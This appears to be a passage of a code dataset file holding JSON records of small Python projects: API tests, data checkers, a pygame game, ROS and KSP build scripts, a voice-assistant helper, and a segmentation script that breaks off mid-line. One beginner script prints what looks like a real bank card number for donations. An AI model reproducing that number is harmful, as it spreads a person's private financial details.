{"seq_id":"6409549880","text":"\"\"\"modules\"\"\"\nimport requests\nimport allure\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_available_access():\n    \"\"\"modules\"\"\"\n    response = requests.get(\"http://av.by\", timeout=10)\n    assert response.status_code == 200\n\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_not_available_access():\n    \"\"\"modules\"\"\"\n    response = requests.get(\"https://cars.av.by/alfa-romeo/giulietta/100889306\", timeout=10)\n    assert response.status_code != 200\n\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_not_authorize_access():\n    \"\"\"modules\"\"\"\n    response = requests.get(\"http://av.by/api\", timeout=10)\n    text = response.json()\n    print(text)\n    assert response.status_code == 401\n\n\n@allure.feature('API test')\n@allure.story('Headers')\ndef test_check_headers():\n    \"\"\"modules\"\"\"\n    response = requests.get(\"http://av.by/api\", timeout=10)\n    data = response.request.headers\n    print(data)\n    assert response.headers[\"Connection\"] == \"keep-alive\"\n","repo_name":"AndreiQA/website_test","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"8862883240","text":"import numpy as np\nimport glob\nimport re\nimport threading\n\nCHANNELS_TO_CHECK = 4\nclass TestdataCheckerThread (threading.Thread):\n    def __init__(self, channel):\n        threading.Thread.__init__(self)\n        self.channel = channel\n    \n    def run(self):\n        paths = glob.glob(f'/media/nvme-stripe/capture_{self.channel}_*.bin')\n        paths.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])\n        last_counter_of_previous_file = 0\n        print(f'Checking channel {self.channel}.')\n        if not paths:\n            print(f'Channel {self.channel} has no data.')\n\n        for file_idx, path in enumerate(paths):\n            iq = np.fromfile(path, dtype=np.uint16)\n            iq = np.reshape(iq, (-1, 4)).T\n            print(f'Checking file {file_idx} of {len(paths)}.')\n            for idx in range(4):\n                assert (np.any(iq[idx] & 0xF000 == 0x1000 * (idx + 1))) # check the channel order\n                counter_only = iq[idx] & ~0xF000 # read the actual counters\n                diffs = np.diff(counter_only) 
# the data generator counts up to 2**12-1\n                indexes = np.argwhere(diffs != 1) # so diffs should always be 1 or 4095\n                diffout = counter_only[indexes]\n                assert np.all(diffout == 4095)\n                if file_idx != 0:\n                    if last_counter_of_previous_file == 4095:\n                        assert counter_only[0] == 0  # counter wrapped around to zero\n                    else:\n                        assert counter_only[0] == last_counter_of_previous_file + 1\n                last_counter_of_previous_file = counter_only[-1]\n        print(f'Channel {self.channel} is OK.')\n\nif __name__ == '__main__':\n    threads = []\n    for channel in range(CHANNELS_TO_CHECK):\n        t = TestdataCheckerThread(channel=channel)\n        t.start()\n        threads.append(t)\n\n    for t in threads:\n        t.join()","repo_name":"Rohde-Schwarz/rs-wbiq","sub_path":"src/data_checker/data_checker.py","file_name":"data_checker.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"31625703676","text":"\"\"\"A pytest plugin for using pyfakefs as a fixture\n\nWhen pyfakefs is installed, the \"fs\" fixture becomes available.\n\n:Usage:\n\ndef my_fakefs_test(fs):\n    fs.create_file('/var/data/xx1.txt')\n    assert os.path.exists('/var/data/xx1.txt')\n\"\"\"\nimport py\nimport pytest\nfrom pyfakefs.fake_filesystem_unittest import Patcher\n\nPatcher.SKIPMODULES.add(py)  # Ignore pytest components when faking filesystem\n\n\n@pytest.fixture\ndef fs(request):\n    \"\"\" Fake filesystem. \"\"\"\n    patcher = Patcher()\n    patcher.setUp()\n    request.addfinalizer(patcher.tearDown)\n    return patcher.fs\n","repo_name":"kobayashi/s3monkey","sub_path":"s3monkey/pyfakefs/pytest_plugin.py","file_name":"pytest_plugin.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"19"}
{"seq_id":"43503255945","text":"import os\n\nprint(os.getcwd())\nos.mkdir(\"Dir_1\")\nos.chdir(\"Dir_1\")\nos.mkdir(\"Dir_2\")\nos.chdir(\"Dir_2\")\nprint(os.getcwd())\nos.chdir(\"..\")\nos.mkdir(\"Dir_3\")\nos.chdir(\"Dir_3\")\nos.mkdir(\"Dir_4\")\nos.chdir(\"Dir_4\")\nprint(os.getcwd())\n\nquestion = input(\"Do you want to delete the folders you created? 
Press Yes or No: \")\n\nif question == \"Yes\":\n os.chdir(\"..\")\n os.rmdir(\"Dir_4\")\n os.chdir(\"..\")\n os.rmdir(\"Dir_3\")\n os.rmdir(\"Dir_2\")\n os.chdir(\"..\")\n os.rmdir(\"Dir_1\")\n print(os.getcwd())\n","repo_name":"Anush184/Homework","sub_path":"createdir.py","file_name":"createdir.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4448235557","text":"\"\"\"Tally Counter.\"\"\"\nfrom __future__ import annotations\n\nimport threading\n\nfrom typing import Any\n\nfrom .series import _Series\n\n\nclass Counter:\n \"\"\"A container for any number of named data series.\"\"\"\n\n def __init__(self, *args: str, **kwargs: int) -> None:\n # Thread safety lock\n self._lock = threading.RLock()\n\n ttl = self._get_int_or_none(kwargs, \"ttl\")\n maxlen = self._get_int_or_none(kwargs, \"maxlen\")\n\n init_data: dict[str, _Series] = {}\n for k in args:\n init_data[str(k)] = _Series(None, ttl=ttl, maxlen=maxlen, lock=self._lock)\n\n for k, v in kwargs.items():\n init_data[str(k)] = _Series(int(v), ttl=ttl, maxlen=maxlen, lock=self._lock)\n\n with self._lock:\n self.__data = init_data\n self.__ttl = ttl\n self.__maxlen = maxlen\n\n @property\n def data(self) -> dict[str, list[tuple[int, int]]]:\n \"\"\"Return all data for this counter.\"\"\"\n with self._lock:\n return {k: v.data for k, v in self.__data.items()}\n\n @property\n def ttl(self) -> int | None:\n \"\"\"Return thr `ttl` property.\"\"\"\n with self._lock:\n return self.__ttl\n\n def __getattr__(self, name: str) -> _Series:\n \"\"\"\n Return a data series for the given attribute name.\n\n If no data series exists for the given name, then create an empty series and\n return that.\n \"\"\"\n return self._get_or_create_series(key=name)\n\n def __getitem__(self, key: str) -> _Series:\n \"\"\"\n Return a data series for the given key value.\n\n If no data series exists for the given key, then create an empty series and\n return that.\n \"\"\"\n return self._get_or_create_series(key=key)\n\n @staticmethod\n def _get_int_or_none(container: dict[str, Any], key: str) -> int | None:\n try:\n return int(container.pop(key))\n except KeyError:\n return None\n except ValueError as e:\n raise TypeError(f\"'int' expected for argument '{key}'\") from e\n\n def _get_or_create_series(self, key: str) -> _Series:\n with self._lock:\n if key not in self.__data:\n self.__data[key] = _Series(\n None, ttl=self.__ttl, maxlen=self.__maxlen, lock=self._lock\n )\n\n return self.__data[key]\n","repo_name":"houseman/tally-counter","sub_path":"src/tally_counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"18181670098","text":"#RANDOM DSA IN PYTHON\n\ntel = {'jack': 1234, 'ben': 4567, 'ris': 8904}\n#print(tel['ris'])\n\ntel['ze'] = 13425664\nsorted(tel)\n\n#print(tel['ze'])\n\n#print(list(tel))\n\n#for k in tel.items():\n #print(k)\n\nmyList = ['tic', 'tac', 'toe']\nprint(len(myList))\n\n#for n in myList:\n # print (n)\n # print('.......................')\n \n#for i in range (len (myList)):\n # print(myList[i])\n # print('........................')\n\n#presidents = ['kibaki', 'uhuru', 'mwai', 'daniel', 'mzee']\n#for num, name in enumerate(presidents):\n # print(num, name)\n\nquestion = ['name', 'food', 'career']\nanswer = ['Harry', 'pork', 'elite software dev']\n\nfor q, a in zip(question, answer):\n print (\"What is your 
{0}? It is {1}.\".format(q, a))\n\nr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 10]\nfor i in r:\n print(i)","repo_name":"GitauHarrison/automate-the-boring-stuff","sub_path":"dsa.py","file_name":"dsa.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20275216311","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Platform(Sprite):\n def __init__(self, JA):\n super().__init__()\n self.settings = JA.settings\n self.screen = JA.screen\n self.player = JA.player\n\n #platform\n self.image = pygame.Surface((self.settings.platform_width,self.settings.platform_height))\n self.rect = self.image.get_rect()\n self.rect.center = (150,self.settings.screen_height - 60)\n\n","repo_name":"abhijit360/Jump_game","sub_path":"platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39839828502","text":"# 풀이 1: 딕셔너리 활용\n\nword = input()\ndic = {}\nmost_frequently = -1\nans = []\n\nfor i in word:\n i = i.lower()\n if i.lower() not in dic:\n dic[i] = 1\n else:\n dic[i] += 1\n\nfor i in dic:\n if dic[i] > most_frequently:\n most_frequently = dic[i]\n\nfor i in dic:\n if dic[i] == most_frequently:\n ans.append(i)\n\nif len(ans) > 1:\n print(\"?\")\nelse:\n print(ans[0].upper())\n\n","repo_name":"vanellotree/daily-algorithm","sub_path":"BOJ/string/01157-단어 공부.py","file_name":"01157-단어 공부.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42324594780","text":"#!/usr/bin/env python\n\nimport rospy\n\nfrom xenobot.msg import segment\nfrom xenobot.msg import segmentArray\nfrom numpy import random\nimport math\n\nsegment_data_array = None\ndata_size = 50\nhz = 5\n\ndef data_gen():\n\tglobal segment_data_array\n\tsegment_data_array = segmentArray()\n\tfor i in range(0, data_size, 1):\n\t\tsegment_data = segment(d=-25 + 50*random.rand(),phi=180*random.rand(),color=math.floor(random.rand()*2))\n\t\t#segment_data.data = (d=2.0,phi=1.0,color=0)\n\t\tsegment_data_array.segments.append(segment_data)\n\ndef main():\n\trospy.init_node('publish_test',anonymous=True)\n\n\ttopic_name = \"/xenobot/segment_data\"\n\n\tpub = rospy.Publisher(topic_name,segmentArray,queue_size=5)\n\trate = rospy.Rate(hz)\n\twhile not rospy.is_shutdown():\n\t\tdata_gen()\n\t\tpub.publish(segment_data_array)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n","repo_name":"Puyuma/puyuma-core","sub_path":"tools/publish_test.py","file_name":"publish_test.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"} +{"seq_id":"21071727925","text":"from random import randint\nbalance = 200\nprint(balance)\nname = input(\"как тебя зовут? 
\")\nprint(\"привет \" + name)\nadd = int(input(\"сколько ты вложишь на свой счет: \"))\nbalance = balance + add\nprint(\"сумма вашего бюджета равна: \" + str (balance))\nproducts = ['пс 4', 'Нинтендо', 'Пк', 'Айфон', 'Пс 5']\ntovar = input('Наличие какого товара вы хотите узнать: ')\nif tovar in products:\n print('У нас есть- ', tovar)\nif tovar == 'Айфон':\n balance = balance + 1000\nelif tovar == 'Нинтендо':\n balance = balance + 500\nelif tovar == \"Пк\":\n balance = balance + 500\nelif tovar == 'Пс 5':\n balance = balance + 500\nelif tovar == 'пс 4':\n balance = balance + 500\n\nprint('Будете брать?- ', tovar)\nadd = int(input(\"сколько ты выведешь из своего счета: \"))\nbalance = balance - add\nprint(\"сумма вашего бюджета равна: \" + str (balance))\nanswer = input (\"Хочешь поддержать автора \")\nif answer.upper() == 'ДА':\n print(\"спасибо- кидать сюда 4276 1000 2549 0365\")\nif answer.upper() == 'НЕТ':\n print(\"Ну и не надо\")\nprint(\"Вот все наши продукты: айфон-1000$\",\"Пк-500$\",\"Нинтендо-200$\",\"пс4-300$\",\"пс5-800$\")\n","repo_name":"nibezo/B4111-python","sub_path":"final/arseniy.py","file_name":"arseniy.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25767698752","text":"import pygame # pygame 라이브러리\r\nimport sys #\r\nfrom time import sleep\r\nimport random\r\n\r\nBLACK = (0, 0, 0) # RGB 0 0 0\r\npadWidth = 480 # 게임화면의 가로크기\r\npadHeight = 620 # 게임화면의 세로크기\r\nfalling_object = ['','','','','','','','','',''] # 떨어지는 물체 이미지들\r\npower = ['','','','','','','','','',''] # 전기 이미지\r\n\r\ndef drawObject(obj, x ,y): # 게임에 등장하는 객체를 드로잉\r\n global gamePad\r\n gamePad.blit(obj,(x,y))\r\n\r\ndef initGame(): # 게임초기화\r\n global gamePad, clock ,background, earth, tear, explosion # 글로벌 변수\r\n pygame.init() # 파이게임 초기화\r\n gamePad = pygame.display.set_mode((padWidth, padHeight)) # 게임크기 정의\r\n pygame.display.set_caption(\"지구를 지켜라\") # 게임 이름 창의 제목으로 띄워주는 부분\r\n background = pygame.image.load(\"e:\\\\stgame\\녹는빙하3.png\")\r\n # 배경그림 위에 게임화면 설정과 픽셀이 같아야 올바른 이미지 출력\r\n earth = pygame.image.load(\"e:\\\\stgame\\아픈지구700.png\")\r\n tear = pygame.image.load((\"e:\\\\stgame\\눈물1.png\"))\r\n explosion = pygame.image.load((\"e:\\\\stgame\\눈물1.png\")) # 폭발 그림 그리고 밑에 반짝 그림\r\n clock = pygame.time.Clock()\r\n\r\ndef runGame():\r\n global gamepad, clock, background, earth, tear, explosion # 지구\r\n\r\n #전투기 크기 현제 픽셀은 50*50 픽셀과 관련되있나 확인\r\n earthSize = earth.get_rect().size # get_rect() 함수 게임 객체 크기정보 + 좌표정보\r\n earthWidth = earthSize[0]\r\n earthHeight = earthSize[1]\r\n\r\n # 전투기 초기 위치(x,y)\r\n x = padWidth * 0.45\r\n y = padHeight * 0.9\r\n earthX = 0\r\n\r\n tearXY=[] # 무기 좌표 리스트\r\n\r\n #떨어지는 물체 와 전력 랝덤 생성\r\n obj = pygame.image.load(random.choice(falling_object))\r\n objSize = obj.get_rect().size # 물체 크기\r\n objWidth = objSize[0]\r\n objHeight = objSize[1]\r\n\r\n # 물체 및 파워 초기 위치 설정\r\n objX = random.randrange(0, padWidth - objWidth)\r\n objY = 0\r\n objSpeed = 2 #속도를 의미 하는 듯? 
def runGame():\r\n    global gamePad, clock, background, earth, tear, explosion # earth\r\n\r\n    # fighter size; currently 50*50 - check whether this is tied to the pixels\r\n    earthSize = earth.get_rect().size # get_rect() returns the game object's size + coordinate info\r\n    earthWidth = earthSize[0]\r\n    earthHeight = earthSize[1]\r\n\r\n    # initial fighter position (x,y)\r\n    x = padWidth * 0.45\r\n    y = padHeight * 0.9\r\n    earthX = 0\r\n\r\n    tearXY=[] # list of weapon coordinates\r\n\r\n    # randomly spawn a falling object and power-up\r\n    obj = pygame.image.load(random.choice(falling_object))\r\n    objSize = obj.get_rect().size # object size\r\n    objWidth = objSize[0]\r\n    objHeight = objSize[1]\r\n\r\n    # initial position of the object and power-up\r\n    objX = random.randrange(0, padWidth - objWidth)\r\n    objY = 0\r\n    objSpeed = 2 # seems to mean the speed? check whether this could be random too\r\n\r\n    # True when a meteor is hit by a fighter missile\r\n    isShot = False\r\n    shotCount = 0\r\n    objPassed = 0\r\n\r\n    onGame = False\r\n    while not onGame:\r\n        for event in pygame.event.get():\r\n            if event.type in [pygame.QUIT]: # quit the game\r\n                pygame.quit() # handle closing the window: quit pygame / exit the system\r\n                sys.exit()\r\n            # TODO: switch this to up/down/left/right later~\r\n            if event.type in [pygame.KEYDOWN]: # fires when a key is pressed\r\n                if event.key == pygame.K_LEFT: # move the earth left\r\n                    earthX -= 5 # speed\r\n                elif event.key == pygame.K_RIGHT: # move the earth right\r\n                    earthX += 5\r\n                elif event.key == pygame.K_SPACE: # fire a missile~~\r\n                    tearX = x + earthWidth/2\r\n                    tearY = y - earthHeight\r\n                    tearXY.append([tearX, tearY])\r\n\r\n            if event.type in [pygame.KEYUP]: # stop the fighter when an arrow key is released (KEYUP fires on key release)\r\n                if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n                    earthX = 0\r\n\r\n        # re-clamp the fighter position\r\n        x += earthX\r\n        if x < 0:\r\n            x = 0\r\n        elif x > padWidth - earthWidth:\r\n            x = padWidth - earthWidth\r\n\r\n        drawObject(background, 0, 0) # draw the melting-glacier background\r\n        drawObject(earth, x, y)\r\n\r\n        # draw fired missiles - keep this below drawObject(earth, x, y)!\r\n        if len(tearXY) != 0:\r\n            for i, bxy in enumerate(tearXY): # iterate over the missiles - look up enumerate()\r\n                bxy[1] -= 10 # bullet y coordinate - 10 (moves up)\r\n                tearXY[i][1] = bxy[1]\r\n\r\n                # when a missile hits the meteor\r\n                if bxy[1] < objY:\r\n                    if bxy[0] > objX and bxy[0] < objX + objWidth:\r\n                        tearXY.remove(bxy)\r\n                        isShot = True\r\n                        shotCount += 1\r\n\r\n                if bxy[1] <= 0: # when the missile leaves the screen\r\n                    try:\r\n                        tearXY.remove(bxy) # remove the missile\r\n                    except:\r\n                        pass\r\n        # when the object is hit\r\n        if isShot: # meteor explodes\r\n            drawObject(explosion,objX,objY) # object explosion image\r\n\r\n            # new random object\r\n            obj = pygame.image.load(random.choice(falling_object))\r\n            objSize = obj.get_rect().size # object size\r\n            objWidth = objSize[0]\r\n            objHeight = objSize[1]\r\n            objX = random.randrange(0, padWidth - objWidth)\r\n            objY = 0\r\n            isShot = False\r\n\r\n            # speed up after hitting a meteor?\r\n            objSpeed += 0.02\r\n            if objSpeed >= 10:\r\n                objSpeed = 10\r\n        drawObject(obj, objX, objY) # draw the falling object every frame\r\n\r\n\r\n        if len(tearXY) != 0: # draw the missiles\r\n            for bx, by in tearXY:\r\n                drawObject(tear, bx, by)\r\n        writeScore(shotCount) # show the hit score\r\n        objY += objSpeed # move the object downward\r\n\r\n        # when the object falls to the bottom?\r\n        if objY > padHeight:\r\n            # new object (random)\r\n            obj = pygame.image.load(random.choice(falling_object))\r\n            objSize = obj.get_rect().size # object size\r\n            objWidth = objSize[0]\r\n            objHeight = objSize[1]\r\n            objX = random.randrange(0,padWidth-objWidth)\r\n            objY = 0\r\n            objSpeed += 1 # why was this done?\r\n            objPassed += 1 # count the missed object so writePassed()/gameOver() work\r\n            if objPassed == 3: # game over after missing 3 meteors\r\n                gameOver()\r\n\r\n        writePassed(objPassed)\r\n\r\n        # gamePad.fill(BLACK) # game screen (black)\r\n        pygame.display.update() # redraw the game screen\r\n        clock.tick(60) # cap the frame rate at 60 fps\r\n    pygame.quit() # quit pygame\r\n\r\n
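# NOTE: clock.tick(60) caps the loop at roughly 60 frames per second, and all\r\n# movement above is expressed in pixels per frame, so changing the cap also\r\n# changes the effective game speed.\r\n\r\n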
# print a game message\r\ndef writeMessage(text):\r\n    global gamePad\r\n    textfont = pygame.font.Font('NanumGothic.ttf',80)\r\n    text = textfont.render(text,True, (255,0, 0))\r\n    textpos = text.get_rect()\r\n    textpos.center = (padWidth / 2, padHeight / 2)\r\n    gamePad.blit(text,textpos)\r\n    pygame.display.update()\r\n    sleep(2)\r\n    runGame()\r\n\r\n# message shown when the earth collides with an object\r\ndef crash():\r\n    global gamePad\r\n    writeMessage('Fighter destroyed ')\r\n\r\n# show the game-over message\r\ndef gameOver():\r\n    global gamePad\r\n    writeMessage('Game over ')\r\n\r\n# count of objects that were hit\r\ndef writeScore(count):\r\n    global gamePad\r\n    font = pygame.font.Font('NanumGothic.ttf',20) # font size\r\n    text = font.render('Destroyed meteors: ' +str(count),True,(255,255,255)) # color, True? check this\r\n    gamePad.blit(text,(10,0)) # position\r\n# count of objects that passed the bottom of the screen\r\ndef writePassed(count): # let's subtract from this value\r\n    global gamePad\r\n    font = pygame.font.Font('NanumGothic.ttf', 20) # font size\r\n    text = font.render('Missed meteors: ' + str(count), True, (255, 255, 255))\r\n    gamePad.blit(text, (360, 0))\r\n\r\ninitGame()\r\nrunGame()\r\n\r\n# import os\r\n# import sys\r\n# import math\r\n# import pygame\r\n# import pygame.mixer\r\n# from pygame.locals import *\r\n#\r\n# black = 0,0,0\r\n# white = 255,255,255\r\n# red = 255,0,0\r\n# green = 0,255,0\r\n# blue = 0,0,255\r\n#\r\n# screen = screen_width, screen_height = 600, 400\r\n#\r\n# clock = pygame.time.Clock()\r\n#\r\n# pygame.display.set_caption(\"Physics\")\r\n#\r\n# fps_cap = 120\r\n# running = True\r\n# while running:\r\n#     clock.tick(fps_cap)\r\n#\r\n#     for event in pygame.event.get(): #error is here\r\n#         if event.type == pygame.QUIT:\r\n#             running = False\r\n#\r\n#     screen.fill(white)\r\n#\r\n#     pygame.display.flip()\r\n#\r\n# pygame.quit()\r\n# sys.exit\r\n# #!/usr/bin/env python","repo_name":"khfbvxz/bitpy","sub_path":"stgame.py","file_name":"stgame.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"1267549876","text":"import logging\r\nimport coloredlogs\r\nimport sys\r\nfrom _command_mapping import COMMAND_MAPPINGS, COMMAND_DETAILS, MSFT_ACCOUNT_NAME_LIST\r\nfrom _helper import *\r\nfrom azure import *\r\nimport pyttsx3\r\nfrom typing import Callable\r\n\r\n# setup the text to speech engine\r\nengine: pyttsx3.Engine = pyttsx3.init()\r\n# rate at which you want the bot to talk\r\nengine.setProperty(\"rate\", 125)\r\nvoices = engine.getProperty(\"voices\")\r\nengine.setProperty(\"voice\", voices[1].id)\r\n\r\n\r\ndef speak_out(text: str):\r\n    \"\"\"Speak out things from the text\r\n\r\n    Args:\r\n        text (str): text to be spoken\r\n    \"\"\"\r\n\r\n    engine.say(text)\r\n    engine.runAndWait()\r\n\r\n\r\ndef show_help(mode):\r\n    \"\"\"Speak out the commands that the users can perform\r\n\r\n    Args:\r\n        mode (str): how many to show\r\n\r\n    Returns:\r\n        bool, str: method status, aggregated text from command description\r\n    \"\"\"\r\n\r\n    command_success = True\r\n    try:\r\n        total_commands_counter = len(list(COMMAND_DETAILS.items()))\r\n        commands_text = \"Here are some commands that you can use, \"\r\n        # get all the commands from the list\r\n        if mode == \"all\":\r\n            for id, (_, command_info) in enumerate(COMMAND_DETAILS.items()):\r\n                if command_info.get(\"method_name\").find(\"help\") == -1:\r\n                    commands_text += f\". {command_info.get('description')}.\"\r\n        else:\r\n            # get only the top 6 commands from the list\r\n            for id, (_, command_info) in enumerate(COMMAND_DETAILS.items()):\r\n                if command_info.get(\"method_name\").find(\"help\") == -1:\r\n                    commands_text += f\"{command_info.get('description')}, \"\r\n                if id == 5:\r\n                    break\r\n\r\n        text = f\"There are a total of {total_commands_counter} commands. 
\"\n\n complete_sentense = text + commands_text\n logging.info(f\"This is help - {complete_sentense}\")\n speak_out(complete_sentense)\n\n except Exception:\n logging.exception(\"func | show_help | See the below error \")\n command_success = False\n\n return command_success, \"\"\n\n\ndef setup_logging():\n \"\"\"setting up logging configuration\"\"\"\n\n coloredlogs.install(milliseconds=True)\n coloredlogs.install(\n fmt=\"%(asctime)s,%(msecs)03d %(hostname)s %(name)s[%(process)d] | %(levelname)s | %(message)s\"\n )\n\n loghandler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\")\n loghandler.setFormatter(formatter)\n logging.basicConfig(level=logging.INFO, handlers=[loghandler])\n logging.info(\"Starting to log things..\")\n\n\n# work in progress\ndef advanced_command_matching():\n \"\"\"User some sort of algo/flow to match the recognized text with the commands we already have\"\"\"\n pass\n\n\ndef get_persons_email(recognized_text: str):\n \"\"\"Return the persons email address from the recognized text\n\n Args:\n recognized_tex (str): recognized text\n\n Returns:\n str: email address of the person\n \"\"\"\n\n for account in MSFT_ACCOUNT_NAME_LIST:\n if recognized_text.find(account.get(\"name\").lower()) != -1:\n return account.get(\"email\")\n\n\ndef check_chatbot_command(recognized_text: str):\n \"\"\"Check if the command is for a chatbot\n\n Args:\n recognized_text (str): recognized text from the user\n\n Returns:\n bool: True if it's a command else False\n \"\"\"\n\n for command in BOT_INITIALIZE_COMMANDS:\n if recognized_text.find(command) != -1:\n return True\n\n return False\n\n\ndef add_args_to_command_info(recognized_text: str):\n \"\"\"Add additional args to the command method\n\n Args:\n recognized_text (str): recognized text from user\n\n Returns:\n list[str]: args to be passed to the command method\n \"\"\"\n\n result_args_list = []\n # this adds email_id to the args\n email_id = get_persons_email(recognized_text)\n if email_id:\n result_args_list.append(email_id)\n\n # this adds the recognized text to the args\n if check_chatbot_command(recognized_text):\n result_args_list.append(recognized_text)\n\n return result_args_list\n\n\ndef get_command_details(recognized_text: str):\n \"\"\"Try mapping the recognized text with one of the command in the mapping list\n\n Args:\n recognized_text (str): recognized text from user\n\n Returns:\n dict: information about the command matched or None if nothing is matched\n \"\"\"\n\n for command_id, search_string_list in COMMAND_MAPPINGS.items():\n for search_string in search_string_list:\n\n # check if the text has an commands in it\n if recognized_text.find(search_string.lower()) != -1:\n command_info = COMMAND_DETAILS.get(command_id)\n\n # check if we need to add args to the command method\n if command_info.get(\"add_args\") and len(command_info.get(\"args\")) == 0:\n command_info[\"args\"] = add_args_to_command_info(recognized_text)\n\n return command_info\n\n\ndef execute_command(recognized_text: str):\n \"\"\"Get the recognized text and execute the corresponding command\n\n Args:\n text (str): recognized text from user\n \"\"\"\n\n try:\n command_info: dict = get_command_details(recognized_text)\n\n # return if nothing matches the commands we have\n if not command_info:\n logging.info(\"No matching command found!\")\n return\n\n method_name_str = command_info.get(\"method_name\")\n\n logging.info(f\"Command match found - {method_name_str}\")\n\n method_name: Callable = 
globals()[method_name_str]\n\n command_success, speak_args = method_name(\n *command_info.get(\"args\"), **command_info.get(\"kargs\")\n )\n\n text_to_speak = (\n command_info.get(\"success_message\")\n if command_success\n else command_info.get(\"failure_message\")\n )\n\n if command_info.get(\"speak_args\") and command_success:\n text_to_speak = text_to_speak.format(*speak_args)\n\n if text_to_speak:\n speak_out(text_to_speak)\n\n if command_info.get(\"send_code\"):\n return \"codex \" + text_to_speak.format(*speak_args)\n\n except Exception:\n logging.exception(\"An error occurred while trying to execute command\")\n","repo_name":"Santhoshkumard11/Voice-Collab","sub_path":"python_scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"2481837324","text":"import logging\nimport shutil\nfrom lib.exec import SourceDir\nfrom lib.utils import rm_rf, rm\nfrom lib.recipes import Receipt\n\n\nclass KSPModFileLocalizer(Receipt):\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n self.source_dir = SourceDir(game_dir, project_dir.joinpath(\"Sources\", \"KSPModFileLocalizer\"))\n self.for_release_dir = self.project_dir.joinpath(\"FOR_RELEASE\")\n self.source_dir.output = self.for_release_dir.joinpath(\"KSPModFileLocalizer.dll\")\n self.target_file = game_dir.joinpath(\"GameData\", \"KSPModFileLocalizer.dll\")\n\n def build(self):\n logging.info(\" Build Release\")\n rm(self.for_release_dir, \"*.dll\")\n self.source_dir.std_compile(\n references=[\"Assembly-CSharp.dll\", \n \"Assembly-CSharp-firstpass.dll\", \n \"UnityEngine.dll\", \n \"UnityEngine.CoreModule.dll\", \n \"UnityEngine.UI.dll\"])\n\n def can_install(self):\n return self.source_dir.output.exists()\n\n def install(self):\n rm_rf(self.target_file)\n shutil.copy(self.source_dir.output, self.target_file)\n\n def check_installed(self):\n return self.target_file.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/KSPModFileLocalizer.py","file_name":"KSPModFileLocalizer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36090280375","text":"import sys\nimport random\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\n\nfrom resnet_dgcn import resnet_with_dgcn\nfrom PIL import ImageFile\n\n\ndef adaptive_lr(optimizer, epoch, total_epoch, init=0.01):\n\n \n lr = init * math.pow(1.0 - epoch/total_epoch, 0.9)\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n return optimizer\n\n\nclass Cityscapes:\n\n def __init__(self):\n\n img_transform = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))]\n )\n self.trainset = torchvision.datasets.Cityscapes(\n root='./cityscapes',\n split='train',\n mode='fine',\n target_type='semantic',\n transforms=self.cropNflip\n )\n self.trainloader = torch.utils.data.DataLoader(self.trainset,batch_size=1,shuffle=True, num_workers=4)\n\n self.validset = torchvision.datasets.Cityscapes(\n root='./cityscapes',\n split='val',\n mode='fine',\n target_type='semantic',\n transform=img_transform,\n target_transform=self.label_heat_map\n )\n self.validloader = 
